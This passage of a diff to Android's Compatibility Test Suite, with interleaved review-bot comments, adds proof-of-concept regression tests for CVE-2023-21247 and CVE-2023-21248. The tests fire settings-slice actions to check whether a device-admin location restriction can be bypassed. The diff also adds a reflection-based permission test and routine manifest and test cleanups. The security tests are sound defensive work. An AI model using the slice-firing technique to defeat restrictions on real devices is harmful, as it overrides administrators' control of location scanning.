+ ((PendingIntent) intent).send();
+ }
+
+ // For Android T and above createPermissionIntent returns an instance of
+ // Intent
+ if (intent instanceof Intent) {
+ mContext.startActivity(((Intent) intent).addFlags(Intent.FLAG_ACTIVITY_NEW_TASK));
+ }
+
+ // Grant SLICE_PERMISSION by clicking on 'Allow'
+ Pattern allowPattern = Pattern.compile("Allow", Pattern.CASE_INSENSITIVE);
+ assumeTrue(mDevice.wait(Until.hasObject(By.text(allowPattern)), waitMS));
+ UiObject2 allowButton = mDevice.findObject(By.text(allowPattern));
+ allowButton.click();
+ } catch (Exception e) {
+ assumeNoException(e);
+ }
+ }
+
+ @Test
+ public void testPocCVE_2023_21247() {
+ try {
+ final int initialBleScanGlobalSetting =
+ Settings.Global.getInt(
+ mContentResolver, Settings.Global.BLE_SCAN_ALWAYS_AVAILABLE, -1);
+ assumeTrue(initialBleScanGlobalSetting != -1);
+
+ // Launching PocActivity to launch "bluetooth_always_scanning_switch" settings
+ // slice using slice-uri
+ mContext.startActivity(
+ new Intent(mContext, PocActivity.class)
+ .setData(Uri.parse(mBaseUri + "bluetooth_always_scanning_switch"))
+ .addFlags(Intent.FLAG_ACTIVITY_NEW_TASK));
+
+ // Wait for the slice that contains option to toggle "Bluetooth scanning"
+ String btScanningText =
+ mSettingsResources.getString(
+ mSettingsResources.getIdentifier(
+ "location_scanning_bluetooth_always_scanning_title",
+ "string",
+ mSettingsPackage));
+ boolean btScanningFound =
+ mDevice.wait(
+ Until.hasObject(By.text(btScanningText).res(mScanningTextResId)),
+ waitMS);
+ assumeTrue(
+ "Timed out waiting on the text \'" + btScanningText + "\' to appear",
+ btScanningFound);
+
+ // Try to toggle "Bluetooth scanning" button, it is supposed to be disabled by the
+ // Device Admin in presence of fix
+ UiObject2 btScanningToggle = mDevice.findObject(By.res(mScanningWidgetResId));
+ btScanningToggle.click();
+
+ // Value of isChecked is whether "Bluetooth scanning" button should be checked or
+ // unchecked after click()
+ assumeTrue(
+ "Timed out waiting on the button \'" + btScanningToggle + "\' to toggle",
+ btScanningToggle.wait(
+ Until.checked(initialBleScanGlobalSetting == 0 /* isChecked */),
+ waitMS)
+ || !btScanningToggle.isEnabled());
+
+ final int finalBleScanGlobalSetting =
+ Settings.Global.getInt(
+ mContentResolver, Settings.Global.BLE_SCAN_ALWAYS_AVAILABLE, -1);
+ assumeTrue(finalBleScanGlobalSetting != -1);
+
+ assertFalse(
+ "Device is vulnerable to b/277333781 !!",
+ finalBleScanGlobalSetting != initialBleScanGlobalSetting);
+ } catch (Exception e) {
+ assumeNoException(e);
+ }
+ }
+
+ @Test
+ public void testPocCVE_2023_21248() {
+ try {
+ final int initialWifiScanGlobalSetting =
+ Settings.Global.getInt(
+ mContentResolver, Settings.Global.WIFI_SCAN_ALWAYS_AVAILABLE, -1);
+ assumeTrue(initialWifiScanGlobalSetting != -1);
+
+ // Launching PocActivity to launch "wifi_always_scanning_switch" settings
+ // slice using slice-uri
+ mContext.startActivity(
+ new Intent(mContext, PocActivity.class)
+ .setData(Uri.parse(mBaseUri + "wifi_always_scanning_switch"))
+ .addFlags(Intent.FLAG_ACTIVITY_NEW_TASK));
+
+ // Wait for the slice that contains option to toggle "Wifi scanning"
+ String wifiScanningText =
+ mSettingsResources.getString(
+ mSettingsResources.getIdentifier(
+ "location_scanning_wifi_always_scanning_title",
+ "string",
+ mSettingsPackage));
+ boolean wifiScanningFound =
+ mDevice.wait(
+ Until.hasObject(By.text(wifiScanningText).res(mScanningTextResId)),
+ waitMS);
+ assumeTrue(
+ "Timed out waiting on the text \'" + wifiScanningText + "\' to appear",
+ wifiScanningFound);
+
+ // Try to toggle "Wifi scanning" button, it is supposed to be disabled by the
+ // Device Admin in presence of fix
+ UiObject2 wifiScanningToggle = mDevice.findObject(By.res(mScanningWidgetResId));
+ wifiScanningToggle.click();
+
+ // Value of isChecked is whether "Wifi scanning" button should be checked or
+ // unchecked after click()
+ assumeTrue(
+ "Timed out waiting on the button \'" + wifiScanningToggle + "\' to toggle",
+ wifiScanningToggle.wait(
+ Until.checked(
+ initialWifiScanGlobalSetting == 0 /* isChecked */),
+ waitMS)
+ || !wifiScanningToggle.isEnabled());
+
+ final int finalWifiScanGlobalSetting =
+ Settings.Global.getInt(
+ mContentResolver, Settings.Global.WIFI_SCAN_ALWAYS_AVAILABLE, -1);
+ assumeTrue(finalWifiScanGlobalSetting != -1);
+
+ assertFalse(
+ "Device is vulnerable to b/277333746 !!",
+ finalWifiScanGlobalSetting != initialWifiScanGlobalSetting);
+ } catch (Exception e) {
+ assumeNoException(e);
+ }
+ }
+}
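Review bot: `setUp` adds the `DISALLOW_CONFIG_LOCATION` restriction but the class has no `@After` that clears it, so unless the host-side test removes the device admin (not visible here) the device stays restricted after the run. An `@After` method calling `mContext.getSystemService(DevicePolicyManager.class).clearUserRestriction(new ComponentName(mContext, PocDeviceAdminReceiver.class), DISALLOW_CONFIG_LOCATION);` would undo it. On a vulnerable device the test also leaves `BLE_SCAN_ALWAYS_AVAILABLE` or `WIFI_SCAN_ALWAYS_AVAILABLE` flipped. `testPocCVE_2023_21247` and `testPocCVE_2023_21248` differ only in the settings key, slice name, title resource and bug id, so a shared private helper taking those four values would remove the duplication.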
diff --git a/hostsidetests/securitybulletin/test-apps/TestLocationScanningServicesUsingSlices/src/android/security/cts/TestLocationScanningServicesUsingSlices/PocActivity.java b/hostsidetests/securitybulletin/test-apps/TestLocationScanningServicesUsingSlices/src/android/security/cts/TestLocationScanningServicesUsingSlices/PocActivity.java
new file mode 100644
index 0000000..c322cb9
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/TestLocationScanningServicesUsingSlices/src/android/security/cts/TestLocationScanningServicesUsingSlices/PocActivity.java
@@ -0,0 +1,63 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts.TestLocationScanningServicesUsingSlices;
+
+import static android.app.slice.SliceItem.FORMAT_ACTION;
+import static android.app.slice.SliceItem.FORMAT_SLICE;
+
+import androidx.fragment.app.FragmentActivity;
+import androidx.lifecycle.LiveData;
+import androidx.slice.Slice;
+import androidx.slice.SliceItem;
+import androidx.slice.widget.SliceLiveData;
+
+public class PocActivity extends FragmentActivity {
+
+ @Override
+ protected void onResume() {
+ try {
+ super.onResume();
+ LiveData sliceLiveData =
+ SliceLiveData.fromUri(this /* Context */, getIntent().getData());
+ sliceLiveData.observe(
+ this /* LifecycleOwner */,
+ slice -> {
+ if (slice != null) {
+ for (SliceItem outerItem : ((Slice) slice).getItems()) {
+ if (outerItem.getFormat().equals(FORMAT_SLICE)) {
+ for (SliceItem innerItem : outerItem.getSlice().getItems()) {
+ if (innerItem.getFormat().equals(FORMAT_ACTION)) {
+ try {
+ innerItem.fireAction(null, null);
+ } catch (Exception ignored) {
+ // Ignore all exceptions. Any exception here results
+ // in assumption failure in devicetest and prints
+ // appropriate logs
+ }
+ }
+ }
+ break;
+ }
+ }
+ }
+ });
+ } catch (Exception ignored) {
+ // Ignore all exceptions. Any exception here results in assumption failure in devicetest
+ // and prints appropriate logs
+ }
+ }
+}
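Review bot: `LiveData sliceLiveData` is a raw type, which is why the observer needs the `(Slice) slice` cast; declaring it as `LiveData<Slice> sliceLiveData = SliceLiveData.fromUri(this, getIntent().getData());` lets the lambda call `slice.getItems()` directly. The observer is registered in `onResume` and fires every `FORMAT_ACTION` item on each emission, so a second resume or a slice refresh may fire the action again; registering once in `onCreate` and removing the observer after the first firing would make the behaviour deterministic. `getIntent().getData()` is also passed on without a null check, and the outer empty catch currently hides that case.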
diff --git a/tests/tests/security/src/android/security/cts/CVE_2022_20143/PocActivity.java b/hostsidetests/securitybulletin/test-apps/TestLocationScanningServicesUsingSlices/src/android/security/cts/TestLocationScanningServicesUsingSlices/PocDeviceAdminReceiver.java
similarity index 69%
copy from tests/tests/security/src/android/security/cts/CVE_2022_20143/PocActivity.java
copy to hostsidetests/securitybulletin/test-apps/TestLocationScanningServicesUsingSlices/src/android/security/cts/TestLocationScanningServicesUsingSlices/PocDeviceAdminReceiver.java
index 4416990..98be098 100644
--- a/tests/tests/security/src/android/security/cts/CVE_2022_20143/PocActivity.java
+++ b/hostsidetests/securitybulletin/test-apps/TestLocationScanningServicesUsingSlices/src/android/security/cts/TestLocationScanningServicesUsingSlices/PocDeviceAdminReceiver.java
@@ -1,5 +1,5 @@
/*
- * Copyright (C) 2022 The Android Open Source Project
+ * Copyright (C) 2023 The Android Open Source Project
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
@@ -14,9 +14,8 @@
* limitations under the License.
*/
-package android.security.cts.CVE_2022_20143;
+package android.security.cts.TestLocationScanningServicesUsingSlices;
-import android.app.Activity;
+import android.app.admin.DeviceAdminReceiver;
-public class PocActivity extends Activity {
-}
+public class PocDeviceAdminReceiver extends DeviceAdminReceiver {}
diff --git a/hostsidetests/statsdatom/apps/alarmhelperapp/AndroidManifest.xml b/hostsidetests/statsdatom/apps/alarmhelperapp/AndroidManifest.xml
index dcbb59a..c9c3c04 100644
--- a/hostsidetests/statsdatom/apps/alarmhelperapp/AndroidManifest.xml
+++ b/hostsidetests/statsdatom/apps/alarmhelperapp/AndroidManifest.xml
@@ -29,5 +29,7 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="com.android.server.cts.device.statsdalarmhelper"
android:label="Alarm related statsd CTS tests">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener"/>
</instrumentation>
</manifest>
diff --git a/hostsidetests/statsdatom/apps/alarmhelperapp2/AndroidManifest.xml b/hostsidetests/statsdatom/apps/alarmhelperapp2/AndroidManifest.xml
index 2bd7e12..f5939fe 100644
--- a/hostsidetests/statsdatom/apps/alarmhelperapp2/AndroidManifest.xml
+++ b/hostsidetests/statsdatom/apps/alarmhelperapp2/AndroidManifest.xml
@@ -29,5 +29,7 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="com.android.server.cts.device.statsdalarmhelper2"
android:label="Alarm related statsd CTS tests 2">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener"/>
</instrumentation>
</manifest>
diff --git a/hostsidetests/statsdatom/apps/statsdapp/AndroidManifest.xml b/hostsidetests/statsdatom/apps/statsdapp/AndroidManifest.xml
index 72a57d8..a792332 100644
--- a/hostsidetests/statsdatom/apps/statsdapp/AndroidManifest.xml
+++ b/hostsidetests/statsdatom/apps/statsdapp/AndroidManifest.xml
@@ -141,5 +141,7 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="com.android.server.cts.device.statsdatom"
android:label="CTS tests of android.os.statsdatom stats collection">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener"/>
</instrumentation>
</manifest>
diff --git a/hostsidetests/ui/control/AndroidManifest.xml b/hostsidetests/ui/control/AndroidManifest.xml
index 4e2c60b..85f0ba8 100644
--- a/hostsidetests/ui/control/AndroidManifest.xml
+++ b/hostsidetests/ui/control/AndroidManifest.xml
@@ -27,5 +27,8 @@
<instrumentation
android:targetPackage="android.taskswitching.control.cts"
android:name="androidx.test.runner.AndroidJUnitRunner" >
+ <meta-data
+ android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/AlarmManager/src/android/alarmmanager/cts/BackgroundRestrictedAlarmsTest.java b/tests/AlarmManager/src/android/alarmmanager/cts/BackgroundRestrictedAlarmsTest.java
index 2dfb579..37a5a1b 100644
--- a/tests/AlarmManager/src/android/alarmmanager/cts/BackgroundRestrictedAlarmsTest.java
+++ b/tests/AlarmManager/src/android/alarmmanager/cts/BackgroundRestrictedAlarmsTest.java
@@ -115,8 +115,10 @@
updateAlarmManagerConstants();
mActivityManagerDeviceConfigStateHelper
.set("bg_auto_restricted_bucket_on_bg_restricted", "false");
- SystemUtil.runWithShellPermissionIdentity(() ->
- DeviceConfig.setSyncDisabledMode(DeviceConfig.SYNC_DISABLED_MODE_UNTIL_REBOOT));
+ SystemUtil.runWithShellPermissionIdentity(() -> {
+ mInitialSyncDisabledMode = DeviceConfig.getSyncDisabledMode();
+ DeviceConfig.setSyncDisabledMode(DeviceConfig.SYNC_DISABLED_MODE_UNTIL_REBOOT);
+ });
AppOpsUtils.setOpMode(TEST_APP_PACKAGE, OPSTR_RUN_ANY_IN_BACKGROUND, MODE_IGNORED);
makeUidIdle();
setAppStandbyBucket("active");
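Review bot: The value captured in `mInitialSyncDisabledMode` only helps if teardown writes it back, and neither that restore nor the field declaration is in this hunk; the enclosing setup method starts and ends outside it. If an earlier setup statement throws, the field still holds its initial value, so a teardown that restores it unconditionally could set a mode the device never had. I would add a comment above the assignment, `// Remember the current sync mode so tearDown can restore it instead of leaving sync disabled until reboot.`, and confirm the restore runs under the same shell permission identity.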
diff --git a/tests/PhotoPicker/src/android/photopicker/cts/PhotoPickerBaseTest.java b/tests/PhotoPicker/src/android/photopicker/cts/PhotoPickerBaseTest.java
index ea3e2f7..f49f7e1 100644
--- a/tests/PhotoPicker/src/android/photopicker/cts/PhotoPickerBaseTest.java
+++ b/tests/PhotoPicker/src/android/photopicker/cts/PhotoPickerBaseTest.java
@@ -20,8 +20,8 @@
import android.content.Context;
import android.content.Intent;
import android.content.pm.PackageManager;
-import android.text.TextUtils;
import android.os.UserHandle;
+import android.text.TextUtils;
import android.util.Log;
import androidx.annotation.Nullable;
diff --git a/tests/acceleration/AndroidManifest.xml b/tests/acceleration/AndroidManifest.xml
index 59c1b64..e03f56f 100644
--- a/tests/acceleration/AndroidManifest.xml
+++ b/tests/acceleration/AndroidManifest.xml
@@ -32,6 +32,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.acceleration.cts"
android:label="Tests for the Hardware Acceleration APIs." >
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/accessibility/AndroidManifest.xml b/tests/accessibility/AndroidManifest.xml
index 53304a2..1fe3cb6 100644
--- a/tests/accessibility/AndroidManifest.xml
+++ b/tests/accessibility/AndroidManifest.xml
@@ -108,6 +108,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.view.accessibility.cts"
android:label="Tests for the accessibility APIs.">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener"/>
</instrumentation>
</manifest>
diff --git a/tests/accessibility/AndroidTest.xml b/tests/accessibility/AndroidTest.xml
index 50c7791..0ec90a0 100644
--- a/tests/accessibility/AndroidTest.xml
+++ b/tests/accessibility/AndroidTest.xml
@@ -24,6 +24,10 @@
<target_preparer class="com.android.tradefed.targetprep.RunCommandTargetPreparer">
<option name="run-command" value="cmd accessibility set-bind-instant-service-allowed true" />
<option name="teardown-command" value="cmd accessibility set-bind-instant-service-allowed false" />
+ <!-- Enable hidden APIs to allow tests to use reflection, for security tests which
+ check reflection abuse. This must be set before installing the test app. -->
+ <option name="run-command" value="settings put global hidden_api_policy 1" />
+ <option name="teardown-command" value="settings delete global hidden_api_policy" />
</target_preparer>
<target_preparer class="com.android.tradefed.targetprep.suite.SuiteApkInstaller">
<option name="cleanup-apks" value="true" />
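Review bot: The teardown command `settings delete global hidden_api_policy` removes the setting rather than restoring whatever value the device had before the module ran. A device that was deliberately configured with a policy loses it after this module. The relaxed policy also applies device-wide for the whole module, although the comment suggests only the reflection-based security tests need it. I would extend the comment to name the test that depends on it, presumably `testInjectInputEventToInputFilter_throwsWithoutInjectEventsPermission`, and to state that teardown resets the policy to the platform default rather than the previous value.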
diff --git a/tests/accessibility/src/android/view/accessibility/cts/AccessibilityManagerTest.java b/tests/accessibility/src/android/view/accessibility/cts/AccessibilityManagerTest.java
index 6c21058..1c8f684 100644
--- a/tests/accessibility/src/android/view/accessibility/cts/AccessibilityManagerTest.java
+++ b/tests/accessibility/src/android/view/accessibility/cts/AccessibilityManagerTest.java
@@ -18,12 +18,17 @@
import static android.accessibility.cts.common.InstrumentedAccessibilityService.TIMEOUT_SERVICE_ENABLE;
+import static com.google.common.truth.Truth.assertThat;
+
import static org.junit.Assert.assertEquals;
import static org.junit.Assert.assertFalse;
import static org.junit.Assert.assertSame;
+import static org.junit.Assert.assertThrows;
import static org.junit.Assert.assertTrue;
import static org.junit.Assert.fail;
+
+import android.Manifest;
import android.accessibility.cts.common.AccessibilityDumpOnFailureRule;
import android.accessibility.cts.common.InstrumentedAccessibilityService;
import android.accessibility.cts.common.InstrumentedAccessibilityServiceTestRule;
@@ -32,9 +37,12 @@
import android.app.Service;
import android.app.UiAutomation;
import android.content.Context;
+import android.content.pm.PackageManager;
import android.content.pm.ServiceInfo;
import android.os.Handler;
import android.platform.test.annotations.AsbSecurityTest;
+import android.view.InputEvent;
+import android.view.MotionEvent;
import android.view.accessibility.AccessibilityEvent;
import android.view.accessibility.AccessibilityManager;
import android.view.accessibility.AccessibilityManager.AccessibilityServicesStateChangeListener;
@@ -58,6 +66,9 @@
import org.junit.runner.RunWith;
import java.io.IOException;
+import java.lang.reflect.Field;
+import java.lang.reflect.InvocationTargetException;
+import java.lang.reflect.Method;
import java.util.List;
import java.util.concurrent.atomic.AtomicBoolean;
@@ -202,6 +213,32 @@
assertFalse(mAccessibilityManager.removeAccessibilityServicesStateChangeListener(listener));
}
+ @AsbSecurityTest(cveBugId = {309426390})
+ @Test
+ public void testInjectInputEventToInputFilter_throwsWithoutInjectEventsPermission()
+ throws Exception {
+ // Ensure the test itself doesn't have INJECT_EVENTS permission before
+ // calling the method that requires it and expecting failure.
+ assertThat(sInstrumentation.getContext().checkSelfPermission(
+ Manifest.permission.INJECT_EVENTS)).isEqualTo(PackageManager.PERMISSION_DENIED);
+
+ // Use reflection to directly invoke IAccessibilityManager#injectInputEventToInputFilter.
+ final AccessibilityManager accessibilityManager = (AccessibilityManager)
+ sInstrumentation.getContext().getSystemService(Service.ACCESSIBILITY_SERVICE);
+ final Field serviceField = AccessibilityManager.class.getDeclaredField("mService");
+ serviceField.setAccessible(true);
+ final Method injectInputEventToInputFilter =
+ Class.forName("android.view.accessibility.IAccessibilityManager")
+ .getDeclaredMethod("injectInputEventToInputFilter", InputEvent.class);
+
+ final InvocationTargetException exception = assertThrows(InvocationTargetException.class,
+ () -> injectInputEventToInputFilter.invoke(
+ serviceField.get(accessibilityManager),
+ MotionEvent.obtain(0, 0, 0, 0, 0, 0)));
+ assertThat(exception).hasCauseThat().isInstanceOf(SecurityException.class);
+ assertThat(exception).hasCauseThat().hasMessageThat().contains("INJECT_EVENTS");
+ }
+
@Test
public void testGetInstalledAccessibilityServicesList() throws Exception {
List<AccessibilityServiceInfo> installedServices =
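Review bot: The `assertThrows` lambda covers more than the call under test: it also evaluates `serviceField.get(accessibilityManager)` and `MotionEvent.obtain(0, 0, 0, 0, 0, 0)`, and the obtained event is never recycled. Reading the binder first with `final Object service = serviceField.get(accessibilityManager);` and recycling the event in a `finally` would keep the assertion scoped to `injectInputEventToInputFilter`. The `hasMessageThat().contains("INJECT_EVENTS")` check ties the test to the wording of the exception. The `SecurityException` cause assertion is what carries the permission guarantee, so the message check deserves a comment saying why it is there. The test also needs a short Javadoc noting that the reflection on `mService` only works with a relaxed hidden API policy.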
diff --git a/tests/accessibilityservice/AndroidManifest.xml b/tests/accessibilityservice/AndroidManifest.xml
index d3033f6..550c8e7 100644
--- a/tests/accessibilityservice/AndroidManifest.xml
+++ b/tests/accessibilityservice/AndroidManifest.xml
@@ -308,6 +308,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.accessibilityservice.cts"
android:label="Tests for the accessibility APIs.">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener"/>
</instrumentation>
diff --git a/tests/accessibilityservice/src/android/accessibilityservice/cts/TouchInteractionControllerTest.java b/tests/accessibilityservice/src/android/accessibilityservice/cts/TouchInteractionControllerTest.java
index d4a5df6..2baf74e 100644
--- a/tests/accessibilityservice/src/android/accessibilityservice/cts/TouchInteractionControllerTest.java
+++ b/tests/accessibilityservice/src/android/accessibilityservice/cts/TouchInteractionControllerTest.java
@@ -21,12 +21,10 @@
import static android.accessibilityservice.cts.utils.GestureUtils.click;
import static android.accessibilityservice.cts.utils.GestureUtils.dispatchGesture;
import static android.accessibilityservice.cts.utils.GestureUtils.doubleTap;
-import static android.accessibilityservice.cts.utils.GestureUtils.interruptedSwipe;
import static android.accessibilityservice.cts.utils.GestureUtils.swipe;
import static android.view.MotionEvent.ACTION_DOWN;
import static android.view.MotionEvent.ACTION_HOVER_ENTER;
import static android.view.MotionEvent.ACTION_HOVER_EXIT;
-import static android.view.MotionEvent.ACTION_HOVER_MOVE;
import static android.view.MotionEvent.ACTION_MOVE;
import static android.view.MotionEvent.ACTION_POINTER_DOWN;
import static android.view.MotionEvent.ACTION_POINTER_UP;
@@ -240,40 +238,7 @@
mTouchListener.assertNonePropagated();
}
- /**
- * Test whether interrupting and continuing touch exploration generates a consistent motion
- * event stream.
- */
- @Test
- @AppModeFull
- public void testInterruptedSwipe_generatesConsistentEventStream() {
- if (!mHasTouchscreen || !mScreenBigEnough) return;
- assertBasicConsistency();
- mController.registerCallback(
- Executors.newSingleThreadExecutor(),
- new BaseCallback() {
- public void onMotionEvent(MotionEvent event) {
- if (event.getActionMasked() == ACTION_DOWN
- && mController.getState()
- != TouchInteractionController.STATE_TOUCH_EXPLORING) {
- mController.requestTouchExploration();
- }
- }
- });
- PointF startPoint = add(mTapLocation, -mSwipeDistance, 0);
- PointF endPoint = add(mTapLocation, mSwipeDistance, 0);
- dispatch(interruptedSwipe(startPoint, endPoint, mSwipeTimeMillis));
- mHoverListener.assertPropagated(ACTION_HOVER_ENTER, ACTION_HOVER_MOVE, ACTION_HOVER_EXIT);
- // If the touch exploration request arrives to the framework too late, we might only see one
- // hover interaction that combines both swipes.
- // All we care about is that the stream is consistent.
- if (mHoverListener.peek() != null) {
- mHoverListener.assertPropagated(
- ACTION_HOVER_ENTER, ACTION_HOVER_MOVE, ACTION_HOVER_EXIT);
- }
- }
-
-/** Test whether we can initiate a drag. */
+ /** Test whether we can initiate a drag. */
@Test
@AppModeFull
@FlakyTest
diff --git a/tests/accessibilityservice/src/android/accessibilityservice/cts/utils/EventCapturingHoverListener.java b/tests/accessibilityservice/src/android/accessibilityservice/cts/utils/EventCapturingHoverListener.java
index 8d5e2e8..c0ce0d2 100644
--- a/tests/accessibilityservice/src/android/accessibilityservice/cts/utils/EventCapturingHoverListener.java
+++ b/tests/accessibilityservice/src/android/accessibilityservice/cts/utils/EventCapturingHoverListener.java
@@ -108,8 +108,4 @@
throw new RuntimeException(e);
}
}
-
- public MotionEvent peek() {
- return mEvents.peek();
- }
}
diff --git a/tests/accessibilityservice/src/android/accessibilityservice/cts/utils/GestureUtils.java b/tests/accessibilityservice/src/android/accessibilityservice/cts/utils/GestureUtils.java
index 86fa5bc..32e2b8f0 100644
--- a/tests/accessibilityservice/src/android/accessibilityservice/cts/utils/GestureUtils.java
+++ b/tests/accessibilityservice/src/android/accessibilityservice/cts/utils/GestureUtils.java
@@ -106,22 +106,6 @@
return new StrokeDescription(path(from, to), 0, duration);
}
- /**
- * Simulates a touch exploration swipe that is interrupted partway through for a specified
- * amount of time, and then continued.
- */
- public static GestureDescription interruptedSwipe(PointF from, PointF to, long duration) {
- GestureDescription.Builder builder = new GestureDescription.Builder();
- long time = 0;
- PointF midpoint = new PointF((from.x + to.x) / 2.0f, (from.y + to.y) / 2.0f);
- StrokeDescription swipe1 = new StrokeDescription(path(from, midpoint), 0, duration / 2);
- builder.addStroke(swipe1);
- time += swipe1.getDuration() + STROKE_TIME_GAP_MS;
- StrokeDescription swipe2 = startingAt(time, swipe(midpoint, to, duration / 2));
- builder.addStroke(swipe2);
- return builder.build();
- }
-
public static StrokeDescription drag(StrokeDescription from, PointF to) {
return from.continueStroke(
path(lastPointOf(from), to),
diff --git a/tests/accessibilityservice/testsdk29/AndroidManifest.xml b/tests/accessibilityservice/testsdk29/AndroidManifest.xml
index 096ab69..ad47ad7 100644
--- a/tests/accessibilityservice/testsdk29/AndroidManifest.xml
+++ b/tests/accessibilityservice/testsdk29/AndroidManifest.xml
@@ -42,6 +42,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.accessibilityservice.cts.testsdk29"
android:label="Tests for the accessibility Sdk 29 APIs.">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener"/>
</instrumentation>
</manifest>
diff --git a/tests/admin/AndroidManifest.xml b/tests/admin/AndroidManifest.xml
index 4341b15..54adff3 100644
--- a/tests/admin/AndroidManifest.xml
+++ b/tests/admin/AndroidManifest.xml
@@ -27,6 +27,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.admin.app"
android:label="Tests for the admin APIs.">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/app/Android.bp b/tests/app/Android.bp
index 0652fab..c8f3dcb 100644
--- a/tests/app/Android.bp
+++ b/tests/app/Android.bp
@@ -103,7 +103,7 @@
"general-tests",
],
sdk_version: "test_current",
- min_sdk_version: "14",
+ min_sdk_version: "19",
manifest: "DownloadManagerApi28Test/AndroidManifest.xml",
test_config: "DownloadManagerApi28Test/AndroidTest.xml",
lint: {
@@ -139,7 +139,7 @@
"general-tests",
],
sdk_version: "test_current",
- min_sdk_version: "14",
+ min_sdk_version: "19",
manifest: "DownloadManagerInstallerTest/AndroidManifest.xml",
test_config: "DownloadManagerInstallerTest/AndroidTest.xml",
lint: {
diff --git a/tests/appsearch/src/com/android/cts/appsearch/external/app/SearchSpecCtsTest.java b/tests/appsearch/src/com/android/cts/appsearch/external/app/SearchSpecCtsTest.java
index d19df19..d384327 100644
--- a/tests/appsearch/src/com/android/cts/appsearch/external/app/SearchSpecCtsTest.java
+++ b/tests/appsearch/src/com/android/cts/appsearch/external/app/SearchSpecCtsTest.java
@@ -69,10 +69,10 @@
SearchSpec.GROUPING_TYPE_PER_NAMESPACE
| SearchSpec.GROUPING_TYPE_PER_PACKAGE,
/*limit=*/ 37)
- .addProjection("schemaTypes1", expectedPropertyPaths1)
- .addProjection("schemaTypes2", expectedPropertyPaths2)
- .setPropertyWeights("schemaTypes1", expectedPropertyWeights)
- .setPropertyWeightPaths("schemaTypes2", expectedPropertyWeightPaths)
+ .addProjection("schemaType1", expectedPropertyPaths1)
+ .addProjection("schemaType2", expectedPropertyPaths2)
+ .setPropertyWeights("schemaType1", expectedPropertyWeights)
+ .setPropertyWeightPaths("schemaType2", expectedPropertyWeightPaths)
.setNumericSearchEnabled(true)
.setVerbatimSearchEnabled(true)
.setListFilterQueryLanguageEnabled(true)
@@ -101,21 +101,21 @@
| SearchSpec.GROUPING_TYPE_PER_PACKAGE);
assertThat(searchSpec.getProjections())
.containsExactly(
- "schemaTypes1",
+ "schemaType1",
expectedPropertyPaths1,
- "schemaTypes2",
+ "schemaType2",
expectedPropertyPaths2);
assertThat(searchSpec.getResultGroupingLimit()).isEqualTo(37);
assertThat(searchSpec.getPropertyWeights().keySet())
- .containsExactly("schemaTypes1", "schemaTypes2");
- assertThat(searchSpec.getPropertyWeights().get("schemaTypes1"))
+ .containsExactly("schemaType1", "schemaType2");
+ assertThat(searchSpec.getPropertyWeights().get("schemaType1"))
.containsExactly("property1", 1.0, "property2", 2.0);
- assertThat(searchSpec.getPropertyWeights().get("schemaTypes2"))
+ assertThat(searchSpec.getPropertyWeights().get("schemaType2"))
.containsExactly("property1.nested", 1.0);
- assertThat(searchSpec.getPropertyWeightPaths().get("schemaTypes1"))
+ assertThat(searchSpec.getPropertyWeightPaths().get("schemaType1"))
.containsExactly(
new PropertyPath("property1"), 1.0, new PropertyPath("property2"), 2.0);
- assertThat(searchSpec.getPropertyWeightPaths().get("schemaTypes2"))
+ assertThat(searchSpec.getPropertyWeightPaths().get("schemaType2"))
.containsExactly(new PropertyPath("property1.nested"), 1.0);
assertThat(searchSpec.isNumericSearchEnabled()).isTrue();
assertThat(searchSpec.isVerbatimSearchEnabled()).isTrue();
diff --git a/tests/autofillservice/src/android/autofillservice/cts/dialog/LoginActivityTest.java b/tests/autofillservice/src/android/autofillservice/cts/dialog/LoginActivityTest.java
index bab038c..0e43f33 100644
--- a/tests/autofillservice/src/android/autofillservice/cts/dialog/LoginActivityTest.java
+++ b/tests/autofillservice/src/android/autofillservice/cts/dialog/LoginActivityTest.java
@@ -36,6 +36,7 @@
import static com.google.common.truth.Truth.assertThat;
+import static org.junit.Assert.assertThrows;
import static org.junit.Assume.assumeTrue;
import android.autofillservice.cts.R;
@@ -50,13 +51,16 @@
import android.autofillservice.cts.testcore.IdMode;
import android.autofillservice.cts.testcore.InstrumentedAutoFillService.FillRequest;
import android.content.Intent;
+import android.graphics.drawable.Icon;
import android.platform.test.annotations.FlakyTest;
import android.util.Log;
import android.view.View;
+import android.widget.RemoteViews;
import androidx.test.uiautomator.UiObject2;
import com.android.compatibility.common.util.CddTest;
+import com.android.compatibility.common.util.RetryableException;
import org.junit.After;
import org.junit.Test;
